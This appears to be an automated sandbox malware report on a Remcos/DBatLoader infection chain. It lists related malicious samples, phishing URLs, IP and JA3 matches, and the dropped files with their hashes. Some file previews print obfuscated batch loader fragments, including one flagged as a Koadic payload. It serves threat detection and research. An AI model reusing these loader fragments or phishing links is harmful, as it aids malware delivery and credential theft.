Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HVC-ASUS	https://magnisteel.lk/4765445b-32c6-49b0-83e6-1d93765276ca.php	Get hash	malicious	HTMLPhisher	Browse	107.155.77.34
	YKLjlQEZKY.elf	Get hash	malicious	Mirai	Browse	46.21.151.191
	SocUwyIjOh.elf	Get hash	malicious	Mirai	Browse	46.21.151.165
	Payment Advice.exe	Get hash	malicious	AgentTesla	Browse	94.100.26.91
	https://freesnippingtool.com/	Get hash	malicious	Unknown	Browse	23.111.140.234
	Credit_Details21367163050417024.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	107.155.77.34
	RFQ183494.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	107.155.77.34
	setup.msi	Get hash	malicious	ScreenConnect Tool	Browse	23.227.196.172
	cf9dPUbn3C.exe	Get hash	malicious	Remcos	Browse	45.74.19.121
	3hHHxU2r9a.exe	Get hash	malicious	Remcos	Browse	45.74.19.121
BOXNETUS	https://app.box.com/notes/1507453019870?s=kehwj6ovapz6c67kovdn3rllmhhdmlvg	Get hash	malicious	Unknown	Browse	74.112.186.144
	2477d13a-fcb8-2f07-6316-7525d24130f8.eml	Get hash	malicious	Unknown	Browse	74.112.186.144
	https://app.box.com/s/hiphn6dvy4mquaedfrgoqd500cedhaza	Get hash	malicious	Unknown	Browse	74.112.186.144
	https://app.box.com/s/ktl5qtvf2us1megbgmjabwqaxcdy69b5	Get hash	malicious	Unknown	Browse	74.112.186.144
	https://bhhc.box.com/embed/s/k5udq0e8lfebxg5bhgsz0w85ljq4njvp?sortColumn=date	Get hash	malicious	Unknown	Browse	74.112.186.144
	https://app.box.com/embed/s/oe90bfnwgyvovnlctwx0zea2joysnjnf?sortColumn=date	Get hash	malicious	Unknown	Browse	74.112.186.144
	https://viewdocscontent.app.box.com/embed/s/ysbwdd9ihnmdk2rxn6pp031bfkbaxlye?sortColumn=date	Get hash	malicious	Unknown	Browse	74.112.186.144
	https://doc83792938.app.box.com/embed/s/qftb48qma3m5atssh6i344ahh6tx3jxb?sortColumn=date	Get hash	malicious	Unknown	Browse	74.112.186.144
	https://7799009877700.box.com/embed/s/j8v0sgp3tsmcwqmf1oc9nej5n0i0cu1y?sortColumn=date	Get hash	malicious	Unknown	Browse	74.112.186.144
	https://7799009877700.box.com/embed/s/j8v0sgp3tsmcwqmf1oc9nej5n0i0cu1y?sortColumn=date	Get hash	malicious	Unknown	Browse	74.112.186.144
ATOM86-ASATOM86NL	OKhCyJ619J.rtf	Get hash	malicious	Remcos, DBatLoader	Browse	178.237.33.50
	fu56fbrtn8.exe	Get hash	malicious	Remcos, DBatLoader	Browse	178.237.33.50
	1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	TcnD64eVFK.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	DHL Express Courier Pickup Confirmation CBJ231025122456.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Quotation.xls	Get hash	malicious	Remcos	Browse	178.237.33.50
	BRUFEN ORDER VAC442_7467247728478134247.vbs	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	copy_76499Kxls.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	payment swift.xls	Get hash	malicious	Remcos, DBatLoader	Browse	178.237.33.50
MICROSOFT-CORP-MSN-AS-BLOCKUS	https://u44056869.ct.sendgrid.net/ls/click?upn=u001.nH1ryR-2Btr2av-2Bkfc8quLEXKlGRKFonctFf3nB-2FAP-2Bjae3IsQgCoKtK-2FQ57cEEmmhZzRyd07G16kQ6rsc4EaJT6S7Rh48kOVsBPHV-2Fkkk9Vfz7cojLOCLuj4sUGVMM7pbdmwtinmtiLhfYkhEkgve628OiJsccHyeYc3lkmkn6epsOmmj4-2Fi-2BWjxfm73m7vUzCOGnDWnQJBmmd6DmkDcfIw-3D-3DU_vL_MRfqZW9nS4IDBSHT8MfJfSAq9b0aOVvtJoUhpW1Ga8ePAnfV-2FfXwE0xIGnayeXag21qNKRc5VLcgMkPlIuCBf7Hi8EFUvj1-2FlklJpMLZNx1IQq8eO26tVdmeuxhGn-2B2zjA71oEkiC9pTrxX9Dz-2FMJk8mkJr62ye1KlBo-2B8fxBlVl-2B6T0POpB0GKoibGhcjh4Z-2FnPU453nMAkUkNy65MlaA-3D-3D	Get hash	malicious	HTMLPhisher	Browse	13.107.213.69
	OKhCyJ619J.rtf	Get hash	malicious	Remcos, DBatLoader	Browse	13.107.137.11
	#U5c97#U4f4d#U8865#U52a9#U5236#U5ea6.docx.doc	Get hash	malicious	Unknown	Browse	52.184.66.142
	fu56fbrtn8.exe	Get hash	malicious	Remcos, DBatLoader	Browse	13.107.139.11
	Payment MT103.xls	Get hash	malicious	Unknown	Browse	13.107.246.69
	Ref_Order04.xls	Get hash	malicious	Unknown	Browse	13.107.213.69
	FT. 40FE CNY .xlsx.lnk	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse	13.107.139.11
	3Shape Unite Installer.exe	Get hash	malicious	Unknown	Browse	40.67.232.186
	OHkRFujs2m.exe	Get hash	malicious	Unknown	Browse	104.208.16.94
	SecuriteInfo.com.Trojan.MSIL.zgRAT.Heur.21652.15881.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	13.107.213.69

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	fu56fbrtn8.exe	Get hash	malicious	Remcos, DBatLoader	Browse	13.107.139.11 74.112.186.144 74.112.186.128 142.250.101.102 142.250.101.132
	Payment MT103.xls	Get hash	malicious	Unknown	Browse	13.107.139.11 74.112.186.144 74.112.186.128 142.250.101.102 142.250.101.132
	Ref_Order04.xls	Get hash	malicious	Unknown	Browse	13.107.139.11 74.112.186.144 74.112.186.128 142.250.101.102 142.250.101.132
	FT. 40FE CNY .xlsx.lnk	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse	13.107.139.11 74.112.186.144 74.112.186.128 142.250.101.102 142.250.101.132
	OHkRFujs2m.exe	Get hash	malicious	Unknown	Browse	13.107.139.11 74.112.186.144 74.112.186.128 142.250.101.102 142.250.101.132
	file.exe	Get hash	malicious	RisePro Stealer	Browse	13.107.139.11 74.112.186.144 74.112.186.128 142.250.101.102 142.250.101.132
	z56NF-Faturada-23042024.msi	Get hash	malicious	MicroClip	Browse	13.107.139.11 74.112.186.144 74.112.186.128 142.250.101.102 142.250.101.132
	768.xla.xlsx	Get hash	malicious	Unknown	Browse	13.107.139.11 74.112.186.144 74.112.186.128 142.250.101.102 142.250.101.132
	Gam.xls	Get hash	malicious	Unknown	Browse	13.107.139.11 74.112.186.144 74.112.186.128 142.250.101.102 142.250.101.132
	szamla_sorszam_8472.xlsm	Get hash	malicious	Unknown	Browse	13.107.139.11 74.112.186.144 74.112.186.128 142.250.101.102 142.250.101.132

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\Libraries\netutils.dll	FT. 40FE CNY .xlsx.lnk	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse
C:\Users\Public\Libraries\easinvoker.exe	OKhCyJ619J.rtf	Get hash	malicious	Remcos, DBatLoader	Browse
	fu56fbrtn8.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	FT. 40FE CNY .xlsx.lnk	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse
	HFiHWvPsvA.rtf	Get hash	malicious	Remcos, DBatLoader	Browse
	payment swift.xls	Get hash	malicious	Remcos, DBatLoader	Browse
	VdwJB2cS5l.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	SecuriteInfo.com.Win32.RATX-gen.9491.24773.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	Purchase order.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	Quotation 20242204.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	pSfqOmM1DG.exe	Get hash	malicious	Remcos, DBatLoader	Browse

Created / dropped Files

C:\ProgramData\remi\logs.dat

Download File

Process:	C:\Users\Public\Libraries\sppsvc.pif
File Type:	data
Category:	dropped
Size (bytes):	288
Entropy (8bit):	7.247397777452547
Encrypted:	false
SSDEEP:	6:dQxh3y1vYCFEMTTxCTBaiNrxmEHM2+51jxYiUckq394+WiTV8:axhWAQNFCTBaYkIFgNvtW
MD5:	6BF5E838D282ABF12ECF709EEF3E8188
SHA1:	188B0EF2DDA2A4871556DB03389A63D4D5ACC6D4
SHA-256:	0A4E5FC37CC676FED44BF02CFA6C66B74B28936CEF3776A7FB97862D6226E2C3
SHA-512:	E2AE0D989F1FA93729D9592D27102D495663CD36529D42DEF4B413EC581CB4632E614A146B4A3FBAD820C9D6E47AD59EDFE2811E00880392B92FABE4F71EA42A
Malicious:	false
Preview:	..+.#.....R1&..JK..K.g...=..J.;..Kv`P...]..m.=`a...K. .....R..[n.4K.w..E.O....."..R.O.+t.Z.v.../CG.....,..........M.b.N.I..R......l.M.v..GN.....O...6.....U.=._.'-..v-F...a..0i.Q.......}Yv..V[......k...q...g.../g.V.L..}.f,....A.s..o.f.......79..cn."..3.P.........8M.....Z.B.v.A.u....

C:\Users\Public\Libraries\KDECO.bat

Download File

Process:	C:\Users\Public\Libraries\sppsvc.pif
File Type:	DOS batch file, ASCII text, with very long lines (468), with CRLF line terminators
Category:	dropped
Size (bytes):	3646
Entropy (8bit):	5.383959173452972
Encrypted:	false
SSDEEP:	96:Zx2A0d5a9zHPwo0uP6SXjr4XtgPmon38JV7ZVhvoXS966hYxcdF4AlM5NQYE2Pl+:3L6jThc/pkmZAXpA2
MD5:	71E46EFE9932B83B397B44052513FB49
SHA1:	741AF3B8C31095A0CC2C39C41E62279684913205
SHA-256:	11C20FABF677CD77E8A354B520F6FFCA09CAC37CE15C9932550E749E49EFE08A
SHA-512:	76DA3B441C0EAAAABDD4D21B0A3D4AA7FD49D73A5F0DAB2CFB39F2E114EFE4F4DABE2D46B01B66D810D6E0EFA97676599ECE5C213C1A69A5F2F4897A9B4AC8DA
Malicious:	false
Preview:	@echo off..set "Nnqr=set "..%Nnqr%"njyC=="..%Nnqr%"qkMvMLsfma%njyC%http"..%Nnqr%"dbvWEsxWns%njyC%rem "..%Nnqr%"NpzRZtRBVV%njyC%Cloa"..%Nnqr%"ftNVZzSZxa%njyC%/Bat"..%Nnqr%"TwupSEtIWD%njyC%gith"..%Nnqr%"yIGacXULig%njyC%k"..%Nnqr%"uGlGnqCSun%njyC%h2sh"..%Nnqr%"FUsYUbfxRq%njyC%s://"..%Nnqr%"ewghYLVJDJ%njyC%om/c"..%Nnqr%"ZxOeNaoDFO%njyC%ub.c"..%dbvWEsxWns%%qkMvMLsfma%%FUsYUbfxRq%%TwupSEtIWD%%ZxOeNaoDFO%%ewghYLVJDJ%%uGlGnqCSun%%ftNVZzSZxa%%NpzRZtRBVV%%yIGacXULig%..%Nnqr%"dbvWEsxWns%njyC%@ech"..%Nnqr%"qkMvMLsfma%njyC%o of"..%Nnqr%"FUsYUbfxRq%njyC%f"..%dbvWEsxWns%%qkMvMLsfma%%FUsYUbfxRq%..%Nnqr%"NOtbuvMLuE%njyC%alph"..%Nnqr%"jSzGRzcKvC%njyC%ul 2"..%Nnqr%"KhBjpctAkV%njyC%.exe"..%Nnqr%"ftNVZzSZxa%njyC%c32."..%Nnqr%"czhHhGJsdj%njyC%m32\"..%Nnqr%"TOzhrohQZT%njyC% C:\"..%Nnqr%"NpzRZtRBVV%njyC%exe "..%Nnqr%"ppIMorhdlj%njyC% &"..%Nnqr%"SXdBSshqoL%njyC%Publ"..%Nnqr%"apGEijJnKT%njyC%\cmd"..%Nnqr%"qkMvMLsfma%njyC%Wind"..%Nnqr%"QxcSEoHMVZ%njyC%s\\S"..%Nnqr%"AvhQIkjRki%njyC%a.ex"..%Nnqr%"yIGacXULig%njyC%/

C:\Users\Public\Libraries\Mywiztwu

Download File

Process:	C:\Users\Public\Libraries\sppsvc.pif
File Type:	data
Category:	dropped
Size (bytes):	838758
Entropy (8bit):	7.145905149219413
Encrypted:	false
SSDEEP:	12288:EiMBx+zAVH5xovzHMKI0JATR8uroclWeV6J1wivL0nEhMfHU0MlXk5:DMJGzHMKhATuOlWeVJREIHxMlXS
MD5:	A82AAD357025A9DAB631D043B6C632DA
SHA1:	3C957FE78AA4E35FE5FD1FFB9A83AAEC1B8D931B
SHA-256:	4DA01BCA561A1690129937B72EC9D62C38DC3D49C12D83C9E91971E506F9E1F1
SHA-512:	DA4D1897A8643B2427A848C403416506E358661AA2E2325C406CBF759FC30241CF841A471DA5A972FF5B140C3240202615753087267116A9845D85933ED42246
Malicious:	true
Preview:	KIJFaV..BaDh"".aDEF!GKIJ""DaEDVXEDBa/9;:86&984'9/04(9,$$,$:=(,940003820(KIJFaV..BaDh"".aDEF!GKIJ""DaEDVXEDBan<:,=7:8$$'KIJFaV..BaDh"".aDEF!GKIJ""DaEDVXEDBa.............W. 4&..s:..._...E..k...!..0..;b..<F.?.U..S.3.Q.\]...Wh._.+U........%.5.`5..j&.<.Q18.. Ev...MW.$.._f.pF;../.W..uY..Wc.]w[.v...S3.)h..L=p.ORc.E.2o.GA.SVj2f.MU..o...?^ib.9.]q..k....E..=Njo..._..K[...p?%0..}7j.,...W..LZ.%..W.!m...T\|..Sn.ZY.E._.).V.kn.^D..K.!M.8.^j.OL..C[ .gBn.hMb.GW..h..Xj,.E1.VO.FN16..<....B...7Sjp .".i.U-y.5.,.D.MUt=.._.s.Eo...Eo.].K...z..i._+.6d.H.-...UV.2.G.n.;T.).V"M..U..$O. ..5...z.L..SR..ON.;.Q.....&\|o.A..@dA.U.m.M...2{oC..U?..Y..S..._.@..#.p.....oA34.....V.X.^..7r.D........f.O...i..Z..UO.@..C..@..-...1.S1.a....?".){..#]K(..G.HN\\|...G..N.....CM......$-,..i.U.+.G.SY..C.+.]._..[.]!3.L..h....?.E.OP.~..e.2g...j._R9.Q.Sn.l.......m..?_.i..mI..5..5.6..Ft. .%.?.7.H.Wf?.B..?_.N../I"j..HN....o#0..%.~...s.{.....E..,.E..j.=..@dHU<. ....U_..f...R......_}am.......O]Z..-.:.H..[...Z..1..6....D.

C:\Users\Public\Libraries\Mywiztwu.PIF

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1646592
Entropy (8bit):	7.46765721821506
Encrypted:	false
SSDEEP:	24576:NGLyrlj2BH1btTfnxx+KKozJQd/HJNRO/BwTQ+l04pEnlk8U2flxAu:NGup2B+K1mzywTQh4psG2Z
MD5:	38310FB63BAD19820D761C97F325896D
SHA1:	CA71E8FD075089FA127281B972D99948E2A562E6
SHA-256:	B8D21812BAEB9054F45B0D7544A6EC25029DA4D733776AAC865F9CE6616FCB07
SHA-512:	44777AA52A467EDCB405C311C1BF29F53BBF1FBF875C842EE8FCC6ADBFB487087613EDE7265391620850D7F4B69864CA7AAE9FA1F1D342BBD8658FCAE04D0AD8
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................p..........D.............@..............................................@........................... ..X$...........................p...`...........................`.......................&...............................text....g.......h.................. ..`.itext...............l.............. ..`.data...LK.......L...t..............@....bss....l6...............................idata..X$... ...&..................@....tls....4....P...........................rdata.......`......................@..@.reloc...`...p...b..................@..B.rsrc................J..............@..@..................... ..............@..@................................................................................................

C:\Users\Public\Libraries\MywiztwuO.bat

Download File

Process:	C:\Users\Public\Libraries\sppsvc.pif
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (15012), with no line terminators
Category:	dropped
Size (bytes):	30026
Entropy (8bit):	3.9380000056299878
Encrypted:	false
SSDEEP:	192:IBOY7cKQ/CyntVZjpubO0bXWQtagxP2+3o5WIGbfJTAy:C
MD5:	828FFBF60677999579DAFE4BF3919C63
SHA1:	A0D159A1B9A49E9EACCC53FE0C3266C0526A1BDC
SHA-256:	ABAC4A967800F5DA708572EC42441EC373CD52459A83A8A382D6B8579482789D
SHA-512:	BF00909E24C5A6FB2346E8457A9ADACD5F1B35988D90ABBDE9FF26896BBB59EDAFEA60D9DB4D10182A7B5E129BB69585D3E20BC5C63AF3517B3A7EF1E45FFB7E
Malicious:	false
Yara Hits:	Rule: MALWARE_BAT_KoadicBAT, Description: Koadic post-exploitation framework BAT payload, Source: C:\Users\Public\Libraries\MywiztwuO.bat, Author: ditekSHen
Preview:	..&@cls&@set "_...=H zAnOeUIivpoS3l71mXMxw8yaqYTEuKgFGPJZRfr@k6Wj9sbQB4VtLD2d0C5Nch"..%_...:~41,1%%_...:~47,1%%_...:~6,1%%_...:~53,1%%_...:~1,1%"_...=%_...:~10,1%%_...:~39,1%%_...:~16,1%%_...:~13,1%%_...:~25,1%%_...:~53,1%%_...:~42,1%%_...:~22,1%%_...:~18,1%%_...:~48,1%%_...:~51,1%%_...:~2,1%%_...:~61,1%%_...:~9,1%%_...:~19,1%%_...:~44,1%%_...:~50,1%%_...:~57,1%%_...:~26,1%%_...:~4,1%%_...:~62,1%%_...:~3,1%%_...:~33,1%%_...:~38,1%%_...:~40,1%%.......%%_...:~60,1%%_...:~0,1%%_...:~43,1%%_...:~34,1%%_...:~58,1%%_...:~15,1%%_...:~7,1%%_...:~20,1%%_...:~49,1%%_...:~35,1%%_...:~14,1%%_...:~30,1%%_...:~36,1%%_...:~41,1%%_...:~45,1%%_...:~11,1%%_...:~55,1%%_...:~32,1%%_...:~17,1%%_...:~63,1%%_...:~56,1%%_...:~21,1%%_...:~37,1%%_...:~8,1%%_...:~54,1%%_...:~28,1%%_...:~6,1%%.......%%_...:~5,1%%_...:~59,1%%_...:~52,1%%_...:~29,1%%_...:~24,1%%_...:~12,1%%_...:~46,1%%_...:~47,1%%_...:~1,1%%_...:~23,1%%_...:~27,1%%_...:~31,1%"..%_...:~38,1%%_...:~59,1%%_...:~51,1%%_...:~5,1%%_...:~60,1%"_....=%_...

C:\Users\Public\Libraries\Null

Download File

Process:	C:\Users\Public\Libraries\sppsvc.pif
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:Fov:c
MD5:	B7E7CB558E4F35D14CC311A04AF6EB1C
SHA1:	DB10C225CD9AF40DDFB3D169365623FAFB809EB2
SHA-256:	2F1A7442C3821FEAC278501216CA44255CC53B3CB9FE9EDB1B79610AFDAA6D25
SHA-512:	9FC2B203591C4FED1C7FD68672E3BB50081896A743EB957854571B95E64D5A1CDFBA4AFEF3B1B40269BA83130C78E7D35C9936770ED04A8AE05145AD25BC176B
Malicious:	false
Preview:	19..

C:\Users\Public\Libraries\easinvoker.exe

Download File

Process:	C:\Users\Public\Libraries\sppsvc.pif
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	131648
Entropy (8bit):	5.225468064273746
Encrypted:	false
SSDEEP:	3072:zar2xXibKcf5K67+k02XbFbosspwUUgcR:Nibl7+k02XZb9UA
MD5:	231CE1E1D7D98B44371FFFF407D68B59
SHA1:	25510D0F6353DBF0C9F72FC880DE7585E34B28FF
SHA-256:	30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
SHA-512:	520887B01BDA96B7C4F91B9330A5C03A12F7C7F266D4359432E7BACC76B0EEF377C05A4361F8FA80AD0B94B5865699D747A5D94A2D3DCDB85DABF5887BB6C612
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: OKhCyJ619J.rtf, Detection: malicious, Browse Filename: fu56fbrtn8.exe, Detection: malicious, Browse Filename: FT. 40FE CNY .xlsx.lnk, Detection: malicious, Browse Filename: HFiHWvPsvA.rtf, Detection: malicious, Browse Filename: payment swift.xls, Detection: malicious, Browse Filename: VdwJB2cS5l.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.RATX-gen.9491.24773.exe, Detection: malicious, Browse Filename: Purchase order.exe, Detection: malicious, Browse Filename: Quotation 20242204.exe, Detection: malicious, Browse Filename: pSfqOmM1DG.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........GF..)...)...).,.....).,.....).,.....)...(.V.).,.....).,.....).,.....).,.....).Rich..).........................PE..d...^PPT.........."..........D...... ..........@............................. ......z................ ..................................................................@&......4....................................................................................text............................... ..`.imrsiv..................................data...............................@....pdata..............................@..@.idata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................

C:\Users\Public\Libraries\netutils.dll

Download File

Process:	C:\Users\Public\Libraries\sppsvc.pif
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	115180
Entropy (8bit):	5.090281411774507
Encrypted:	false
SSDEEP:	1536:iuuRxID3z1yUXtZKmsryc/o5jdePNtq8YCl7MbiRVRBfY+u:iuuRa/ZZK4c/UePNtq8nRBfY+u
MD5:	6BAAEA4D3A65281B55173738795EB02C
SHA1:	1FBE7EC7F5E2D1FB0AB1807E149EEE66A86F9224
SHA-256:	0007FA57DA2E1DE2E487492D00B99ABAECA7E9F9CAC8A10E24EB569E19F76EE1
SHA-512:	AF0285CF961AEAE960EDE41F195809E9B84CCB262F17F2E994DA5C599EBDF712788E5A3F2E0E2ED16E67AA888BDABFD7A6096AD8DDA2D062D2F82B010E81D5C5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29% Antivirus: Virustotal, Detection: 47%, Browse
Joe Sandbox View:	Filename: FT. 40FE CNY .xlsx.lnk, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....&f.X........& ....."....................<a.............................0.......:........ ..............................................................`..(...............\........................... ...(...................................................text...p .......".................. .P`.data...P....@.......(..............@.P..rdata.......P.......*..............@.P@.pdata..(....`.......0..............@.0@.xdata.......p.......4..............@.0@.bss..................................p..edata...............6..............@.0@.idata...............8..............@.0..CRT....X............@..............@.@..tls....h............B..............@.`..reloc..\............D..............@.0B/4...................F..............@.PB/19..................J..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....

C:\Users\Public\Libraries\sppsvc.pif

Download File

Process:	C:\Users\Public\kn.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1646592
Entropy (8bit):	7.46765721821506
Encrypted:	false
SSDEEP:	24576:NGLyrlj2BH1btTfnxx+KKozJQd/HJNRO/BwTQ+l04pEnlk8U2flxAu:NGup2B+K1mzywTQh4psG2Z
MD5:	38310FB63BAD19820D761C97F325896D
SHA1:	CA71E8FD075089FA127281B972D99948E2A562E6
SHA-256:	B8D21812BAEB9054F45B0D7544A6EC25029DA4D733776AAC865F9CE6616FCB07
SHA-512:	44777AA52A467EDCB405C311C1BF29F53BBF1FBF875C842EE8FCC6ADBFB487087613EDE7265391620850D7F4B69864CA7AAE9FA1F1D342BBD8658FCAE04D0AD8
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................p..........D.............@..............................................@........................... ..X$...........................p...`...........................`.......................&...............................text....g.......h.................. ..`.itext...............l.............. ..`.data...LK.......L...t..............@....bss....l6...............................idata..X$... ...&..................@....tls....4....P...........................rdata.......`......................@..@.reloc...`...p...b..................@..B.rsrc................J..............@..@..................... ..............@..@................................................................................................

C:\Users\Public\Mywiztwu.url

Download File

Process:	C:\Users\Public\Libraries\sppsvc.pif
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Mywiztwu.PIF">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	100
Entropy (8bit):	5.034757535568881
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XM4eRSQjvsb9xvogvn:HRYFVmTWDyzV9QTE9uqn
MD5:	C475823DC12EC70B4F390FBDCCF710EA
SHA1:	01F576A744A7AC7583253E52D3B2CCC703E85E8C
SHA-256:	9ADC3F10C641633B3C4F06089ACD60F651DE2456BFC977F2A86F99EFB8783AFE
SHA-512:	9261B9524F0F1A4FF82673FA39C2BADB3AC164D46928AE215B0DF88568A7C4260DA2E6709F6CE0C5484CF91D030FD6886B5757361A42E0FA0C1634A27E2EB803
Malicious:	true
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Mywiztwu.PIF"..IconIndex=51..HotKey=11..

C:\Users\Public\alpha.exe

Download File

Process:	C:\Windows\System32\extrac32.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	modified
Size (bytes):	289792
Entropy (8bit):	6.135598950357573
Encrypted:	false
SSDEEP:	6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
MD5:	8A2122E8162DBEF04694B9C3E0B6CDEE
SHA1:	F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
SHA-256:	B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
SHA-512:	99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OH...&...&...&..V...&..E%...&..E"...&...'../&..E'...&..E#...&..E+...&..E....&..E$...&.Rich..&.................PE..d...S.............".................P..........@.............................p............`.................................................(...................4#...........`......`Z..T............................,...............4...... ........................text............................... ..`.rdata..<.... ......................@..@.data...P...........................@....pdata..4#.......$..................@..@.didat..............................@....rsrc...............................@..@.reloc.......`.......h..............@..B........................................................................................................................................................................................................................

C:\Users\Public\kn.exe

Download File

Process:	C:\Windows\System32\extrac32.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	modified
Size (bytes):	1651712
Entropy (8bit):	6.144018815244304
Encrypted:	false
SSDEEP:	24576:MeiElH5YZ5cv6r3HiaZQ8p4XGwiJDgN7MaikGLIsWWi4pT/Y/7hsyDAP760MKR:Me3lZYUvmSu4XTckYD0sWWiwT/MhTzK
MD5:	F17616EC0522FC5633151F7CAA278CAA
SHA1:	79890525360928A674D6AEF11F4EDE31143EEC0D
SHA-256:	D252235AA420B91C38BFEEC4F1C3F3434BC853D04635453648B26B2947352889
SHA-512:	3ED65172159CD1BCC96B5A0B41D3332DE33A631A167CE8EE8FC43F519BB3E2383A58737A41D25AA694513A68C639F0563A395CD18063975136DE1988094E9EF7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u}{h1..;1..;1..;..;0..;%w.:2..;%w.:*..;%w.:!..;%w.:...;1..;...;%w.:...;%w.;0..;%w.:0..;Rich1..;................PE..d...+. H.........."..................L.........@....................................q.....`.......... ......................................@Q.......`..@........x..............l'..p5..T...........................`(..............x)......XC.......................text............................... ..`.rdata..T...........................@..@.data....&..........................@....pdata...x.......z...\|..............@..@.didat.......P......................@....rsrc...@....`......................@..@.reloc..l'.......(..................@..B........................................................................................................................................................................................................................

C:\Users\Public\sppsvc.rtf

Download File

Process:	C:\Users\Public\kn.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	3293186
Entropy (8bit):	3.923223090117048
Encrypted:	false
SSDEEP:	24576:e2BAiPXRzqJcmxJJ+2VXF0OOSykYSvvV7YZgWgOG7bk1K83smYeDhPmFn7PkuRs5:l
MD5:	C9B027DAE62C2ED28886445584817521
SHA1:	F82FB286B3662AEDD5F9CC7E62945444EB9FCFE7
SHA-256:	9CB3033E5E81CBEA5C1638B2F6C922DC379FE1089A1E3A84CBC40A39F7E414CB
SHA-512:	BEC913CAD1109048C14F182C9CE0720340FFAFDEA2C6D84D5B676122656B494270DCC3049B6F2833275CCBB6A0009B17EFA416114D402251271D991E58C5A44F
Malicious:	false
Preview:	4d5a50000200000004000f00ffff0000b80000000000000040001a00000000000000000000000000000000000000000000000000000000000000000000010000ba10000e1fb409cd21b8014ccd219090546869732070726f6772616d206d7573742062652072756e20756e6465722057696e33320d0a243700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004c010900195e422a0000000000000000e0008e810b0102190070050000ac1300000000004487050000100000009005000000400000100000000200000400000000000000040000000000000000c019000004000000000000020000000000100000400000000010000010000000000000100000000000000000000000002017005824000000e0170000d60100000000000000000000000000000000000070170004600000000000000000000000000000000000000000000000000000006017001800000000000000000000000000000000000000c4261700ac0500000000000000000000000000000000000000000000

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

Download File

Process:	C:\Users\Public\Libraries\sppsvc.pif
File Type:	JSON data
Category:	dropped
Size (bytes):	965
Entropy (8bit):	5.004832253615082
Encrypted:	false
